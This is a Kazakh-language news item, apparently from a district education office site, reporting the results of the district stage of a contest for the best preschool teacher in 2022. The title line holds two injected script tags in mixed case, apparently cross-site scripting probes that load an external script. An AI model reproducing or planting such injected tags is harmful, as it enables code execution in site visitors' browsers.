«Мектепке дейінгі ұйымның үздік педагогі» Республикалық байқауының аудандық кезеңі туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.05.2022

 

 «Мектепке дейінгі ұйымның үздік педагогі» Республикалық байқауының аудандық кезеңі туралы ақпарат

 

          2022 жылы 28 ақпан  «Мектепке дейінгі ұйымның үздік педагогі» Республикалық байқауының аудандық (сырттай) кезеңінің байқауы өтті. Бақауға 2 педагог қатысты.

Мақсаты: мектепке дейінгі ұйымдардың шығармашылықпен жұмыс істейтін педагогтерін қолдау және ынталандыру, тәжірибені және өзін-өзі жүзеге асыру мүмкіндіктерін жетілдіру арқылы кәсіби құзыреттілікті арттыру мүмкіндігін беру.

       Міндеттері:

- қазіргі жағдайда жұмыс істеу үшін қажетті құзыреттілікті дамыту;

- педагогтердің үздіксіз кәсіби өсуі мен педагогикалық шеберлігін қамтамасыз ету;

мектепке дейінгі білім берудің инновациялық әдістерін, құралдары мен технологияларын анықтау және қолдау;

- педагогтердің шығармашылық бастамаларын дамыту және инновациялық қызметке ынталандыру;

- тәрбиеші мамандығының беделін арттыру;

- мектепке дейінгі білім беру педагогтеріне үздік тәжірибемен танысу үшін жағдай жасау.

Байқауда Рахимова Гульнара Қойшыбаевна, Макинск қаласы «Балдырған» мектеп-балабақшасының тәрбиешісі І  жүлделі орын алды және Хуандық Арайгүл,Макинск қаласы «Балдәурен» бөбекжайының  тәрбиешісі ІІ жүлделі орынға ие болды. Рахимова Гульнара Қойшыбаевна облыстық кезеңге жолдама алды.

                                                               

       Г.Баитова                                                  А.Ә.К.әдіскері

Просмотров: 1013


Пікір қосу



Деректерді қолтаңбаға қосу